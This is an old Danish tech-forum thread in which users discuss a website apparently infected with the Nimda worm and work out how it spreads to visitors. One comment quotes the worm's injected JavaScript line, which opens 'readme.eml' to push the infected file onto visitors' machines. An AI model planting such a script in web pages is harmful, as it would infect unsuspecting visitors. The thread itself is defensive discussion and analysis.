Avatar billede cdc Novice
17. december 2001 - 21:05 Der er 16 kommentarer og
1 løsning

Nimda på homepage

Var ude for at søge på nogle fotos på google, og stødte på denne, hvordan kan det lade sig gøre ?

http://www.cdcmedia.dk/eksperten/virus.jpg

/cdc
Avatar billede thundercall Nybegynder
17. december 2001 - 21:10 #1
mmmhh,... spooky,.. jeg får ingen WARNING fra Norton,...
http://www.sinisha.com/illustrat.htm - PAS LIGE Å MED DETTE LINK,...
Avatar billede cdc Novice
17. december 2001 - 21:17 #2
det var derfor jeg la den ud som *.jpg, så jeg ikke smittede nogen

/cdc
Avatar billede prodic Mester
17. december 2001 - 21:24 #3
Hvilket AV-program fanger den virus?
Avatar billede thundercall Nybegynder
17. december 2001 - 21:25 #4
hehe :D

Jeg kunne også selv lide at finde ud af hvordan den ser ud i et HTML dokument, men har endnu ikke været heldig nok til at virkelig finde en Angribene side,...
Avatar billede thundercall Nybegynder
17. december 2001 - 21:27 #5
den ligger ikke i header()
-----
HTTP/1.1 200 OK
Date: Mon, 17 Dec 2001 20:26:13 GMT
Server: Apache/1.3.22 (Unix) mod_throttle/3.2.0 mod_perl/1.26 PHP/4.0.6 mod_ssl/2.8.5 OpenSSL/0.9.6b
X-Powered-By: PHP/4.0.6
Connection: close
Content-Type: text/html
-----
og dette får det til at se endnu mere underligt ud,.. denne server er ikke en MS IIS
Avatar billede cdc Novice
17. december 2001 - 21:29 #6
Jeg bruger mcAfee

/cdc
Avatar billede thundercall Nybegynder
17. december 2001 - 21:34 #7
fandt et svar:

If you visit a compromised Web server, you will be prompted to download an .eml (Outlook Express) email file, which contains the worm as an attachment. You can disable \"File Download\" in your Internet Explorer internet security zones to prevent this compromise

http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html
Avatar billede thundercall Nybegynder
17. december 2001 - 21:35 #8
dette:
<SCRIPT LANGUAGE=\"JavaScript\">window.open(\"readme.eml\", null,
    \"resizable=no,top=6000,left=6000\")</SCRIPT>
Avatar billede cdc Novice
17. december 2001 - 21:42 #9
thundercall-> det vil jo sige at han har nimda på sin egen maskine, og har den lagt ud måske uden at vide det..........eller er det med vilje tror du da scriptet er på alle hans sider.

/cdc
Avatar billede thundercall Nybegynder
17. december 2001 - 21:49 #10
det ser ud til at scriptet er på alle siderne,... men readme.eml er der vist ikke,... det er dog lidt svært at finde ud af da alle siderne siger \"HTTP/1.1 200 OK\",... hvilket betyder at filen er der,..

prøv at se her:
- http://thundercall.dyndns.dk/get_headers.php?host=www.sinisha.com&port=80&addr=%2FIBetThisFileDoesn%27tExists&submit=get
Avatar billede cdc Novice
17. december 2001 - 21:53 #11
det er lidt spooky det her, og hvad så nu med dig har du så fået den da din norton ikke fangede den...???

/cdc
Avatar billede thundercall Nybegynder
17. december 2001 - 21:56 #12
nej det tror jeg bestemt ikke.

Den ville nemlig åbne en \"Save as\" dialog og jeg fik ingen,..

Jeg kan dog godt lige scanne igennem,... det tager noget tid at scanne 60GB :D
Avatar billede thundercall Nybegynder
17. december 2001 - 22:44 #13
done, ingen virus,.. øv ;-)
Avatar billede cdc Novice
30. december 2001 - 10:30 #14
thundercall--> svar lige på spørgsmålet som tak for \"snakken\",.......

/cdc
Avatar billede thundercall Nybegynder
30. december 2001 - 10:35 #15
LOL
Avatar billede cdc Novice
30. december 2001 - 10:45 #16
sådan så skulle det spørgsmål være lukket. Så har jeg ingen åbne spørgsmål.......

Jeg har taget kontakt med ham der har siden, og hans maskine var fuldstændig brændt sammen af virus, men den skulle virke nu.

/cdc
Avatar billede thundercall Nybegynder
30. december 2001 - 10:56 #17
godt at han ikke også fik uploaded den readme.eml
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
IT-kurser om Microsoft 365, sikkerhed, personlig vækst, udvikling, digital markedsføring, grafisk design, SAP og forretningsanalyse.

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester